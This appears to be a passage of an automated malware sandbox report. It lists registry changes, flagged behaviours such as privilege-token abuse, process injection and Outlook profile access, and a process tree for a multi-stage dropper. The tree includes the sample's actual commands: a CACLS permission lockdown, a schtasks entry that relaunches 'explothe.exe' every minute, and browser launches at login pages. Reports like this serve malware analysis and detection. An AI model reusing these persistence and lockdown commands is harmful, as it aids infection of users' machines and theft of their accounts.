| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\CF3B.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\AC4.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\AC4.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\NEAS.34705ad4de6be36a5fc63e785fb9fc10.exe
"C:\Users\Admin\AppData\Local\Temp\NEAS.34705ad4de6be36a5fc63e785fb9fc10.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WK2fw02.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WK2fw02.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1Zw53hP3.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1Zw53hP3.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1204 -ip 1204
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 556
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2lB5147.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2lB5147.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3720 -ip 3720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3720 -s 152
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2820 -ip 2820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 540
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3ri89de.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3ri89de.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4608 -ip 4608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4608 -s 584
C:\Users\Admin\AppData\Local\Temp\CA74.exe
C:\Users\Admin\AppData\Local\Temp\CA74.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Mm7QR3su.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Mm7QR3su.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\wf6Qz1np.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\wf6Qz1np.exe
C:\Users\Admin\AppData\Local\Temp\CB7F.exe
C:\Users\Admin\AppData\Local\Temp\CB7F.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jN8to2ao.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jN8to2ao.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CD54.bat" "
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zW5cl4xg.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zW5cl4xg.exe
C:\Users\Admin\AppData\Local\Temp\CE4F.exe
C:\Users\Admin\AppData\Local\Temp\CE4F.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Os07TC9.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Os07TC9.exe
C:\Users\Admin\AppData\Local\Temp\CF3B.exe
C:\Users\Admin\AppData\Local\Temp\CF3B.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff1b6346f8,0x7fff1b634708,0x7fff1b634718
C:\Users\Admin\AppData\Local\Temp\D2B6.exe
C:\Users\Admin\AppData\Local\Temp\D2B6.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7fff1b6346f8,0x7fff1b634708,0x7fff1b634718
C:\Users\Admin\AppData\Local\Temp\D622.exe
C:\Users\Admin\AppData\Local\Temp\D622.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2024 -ip 2024
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Zh224AA.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Zh224AA.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 560
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2384 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2000,16625266013731086265,18017769266652828025,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,16625266013731086265,18017769266652828025,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3724 -ip 3724
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 784
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16000383192883842431,9401301865539779547,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff1b6346f8,0x7fff1b634708,0x7fff1b634718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
